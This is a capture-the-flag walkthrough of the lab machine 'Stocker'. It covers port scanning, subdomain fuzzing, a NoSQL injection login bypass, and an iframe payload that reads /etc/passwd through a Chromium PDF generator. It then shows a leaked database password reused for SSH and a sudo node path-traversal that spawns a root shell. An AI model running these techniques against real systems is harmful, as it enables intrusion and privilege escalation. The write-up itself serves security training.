Stocker

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.197:22
Open 10.129.228.197:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.197
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-25 17:10 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:10
Completed NSE at 17:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:10
Completed NSE at 17:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:10
Completed NSE at 17:10, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:10
Completed Parallel DNS resolution of 1 host. at 17:10, 0.09s elapsed
DNS resolution of 1 IPs took 0.09s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:10
Scanning 10.129.228.197 [2 ports]
Discovered open port 22/tcp on 10.129.228.197
Discovered open port 80/tcp on 10.129.228.197
Completed Connect Scan at 17:10, 0.08s elapsed (2 total ports)
Initiating Service scan at 17:10
Scanning 2 services on 10.129.228.197
Completed Service scan at 17:11, 6.17s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.197.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 2.29s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.01s elapsed
Nmap scan report for 10.129.228.197
Host is up, received user-set (0.074s latency).
Scanned at 2024-11-25 17:10:54 UTC for 9s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:12:97:1d:86:bc:16:16:83:60:8f:4f:06:e6:d5:4e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/Jyuj3D7FuZQdudxWlH081Q6WkdTVz6G05mFSFpBpycfOrwuJpQ6oJV1I4J6UeXg+o5xHSm+ANLhYEI6T/JMnYSyEmVq/QVactDs9ixhi+j0R0rUrYYgteX7XuOT2g4ivyp1zKQP1uKYF2lGVnrcvX4a6ds4FS8mkM2o74qeZj6XfUiCYdPSVJmFjX/TgTzXYHt7kHj0vLtMG63sxXQDVLC5NwLs3VE61qD4KmhCfu+9viOBvA1ZID4Bmw8vgi0b5FfQASbtkylpRxdOEyUxGZ1dbcJzT+wGEhalvlQl9CirZLPMBn4YMC86okK/Kc0Wv+X/lC+4UehL//U3MkD9XF3yTmq+UVF/qJTrs9Y15lUOu3bJ9kpP9VDbA6NNGi1HdLyO4CbtifsWblmmoRWIr+U8B2wP/D9whWGwRJPBBwTJWZvxvZz3llRQhq/8Np0374iHWIEG+k9U9Am6rFKBgGlPUcf6Mg7w4AFLiFEQaQFRpEbf+xtS1YMLLqpg3qB0=
|   256 7c:4d:1a:78:68:ce:12:00:df:49:10:37:f9:ad:17:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgPXCNqX65/kNxcEEVPqpV7du+KsPJokAydK/wx1GqHpuUm3lLjMuLOnGFInSYGKlCK1MLtoCX6DjVwx6nWZ5w=
|   256 dd:97:80:50:a5:ba:cd:7d:55:e8:27:ed:28:fd:aa:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIDyp1s8jG+rEbfeqAQbCqJw5+Y+T17PRzOcYd+W32hF
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

HTTP (80)

Looks like we have a placeholder SPA, no additional pages are found from links.

Writeup.png

Perform subdomain enumration

└─$ domain='stocker.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 8
       v2.1.0-dev
________________________________________________
dev                     [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 80ms]
Writeup-1.png

The login page is vulnerable to NoSQLi injection

Writeup-2.png

From Burp request in browser and get redirected with right cookie to bypass authentication.

Writeup-3.png

After "purchasing" the Cup we get order ID and order receipt.

Writeup-4.png

The username which we logged in as is Angoose, which is JS NoSQL library, so most probably there's another injection somewhere.

└─$ curl -LOs http://dev.stocker.htb/api/po/6744b18325a793e77791129f

└─$ file 6744b18325a793e77791129f
6744b18325a793e77791129f: PDF document, version 1.4, 1 page(s)

└─$ exiftool 6744b18325a793e77791129f
ExifTool Version Number         : 12.76
File Name                       : 6744b18325a793e77791129f
Directory                       : .
File Size                       : 38 kB
File Modification Date/Time     : 2024:11:25 12:26:36-05:00
File Access Date/Time           : 2024:11:25 12:26:40-05:00
File Inode Change Date/Time     : 2024:11:25 12:26:36-05:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Tagged PDF                      : Yes
Creator                         : Chromium
Producer                        : Skia/PDF m108
Create Date                     : 2024:11:25 17:26:34+00:00
Modify Date                     : 2024:11:25 17:26:34+00:00

Chromium is the creator, so we could try dynamic PDF generation XSS attack, using iframe we can read the /etc/passwd file.

Writeup-5.png
<iframe src=/etc/passwd width=1000 height=1000></iframe>
root:x:0:0:root:/root:/bin/bash
...
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false

I was trying to get location of applications via nginx configuration, but was unlucky. Plus files were too big for PDF.

If we send bad json to /api/order we can leak information about application.

SyntaxError: Unexpected string in JSON at position 188<br>
 &nbsp; &nbsp;at JSON.parse (&lt;anonymous&gt;)<br>
 &nbsp; &nbsp;at parse (/var/www/dev/node_modules/body-parser/lib/types/json.js:89:19)<br>
 &nbsp; &nbsp;at /var/www/dev/node_modules/body-parser/lib/read.js:128:18<br>
 &nbsp; &nbsp;at AsyncResource.runInAsyncScope (node:async_hooks:203:9)<br>
 &nbsp; &nbsp;at invokeCallback (/var/www/dev/node_modules/raw-body/index.js:231:16)<br>
 &nbsp; &nbsp;at done (/var/www/dev/node_modules/raw-body/index.js:220:7)<br>
 &nbsp; &nbsp;at IncomingMessage.onEnd (/var/www/dev/node_modules/raw-body/index.js:280:7)<br>
 &nbsp; &nbsp;at IncomingMessage.emit (node:events:513:28)<br>
 &nbsp; &nbsp;at endReadableNT (node:internal/streams/readable:1359:12)<br>
 &nbsp; &nbsp;at process.processTicksAndRejections (node:internal/process/task_queues:82:21)

.env file doesn't exist, but /var/www/dev/index.js contains connection string for mongodb.

// TODO: Configure loading from dotenv for production
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

SSH (22)

Creds: angoose:IHeardPassphrasesArePrettySecure

└─$ ssh angoose@stocker.htb
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)

User.txt

angoose@stocker:~$ cat user.txt
6133fb72c0c9ecb9c7d8d4e4301e2c70

Privilege Escalation

angoose@stocker:~$ sudo -l
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

https://gtfobins.github.io/gtfobins/node/

angoose@stocker:~$ echo 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})' > t.js
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/t.js
# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

# cd /root
# cat root.txt
529752b61de9796389ee08a0f61b7412
PreviousSocketNextSupport

Last updated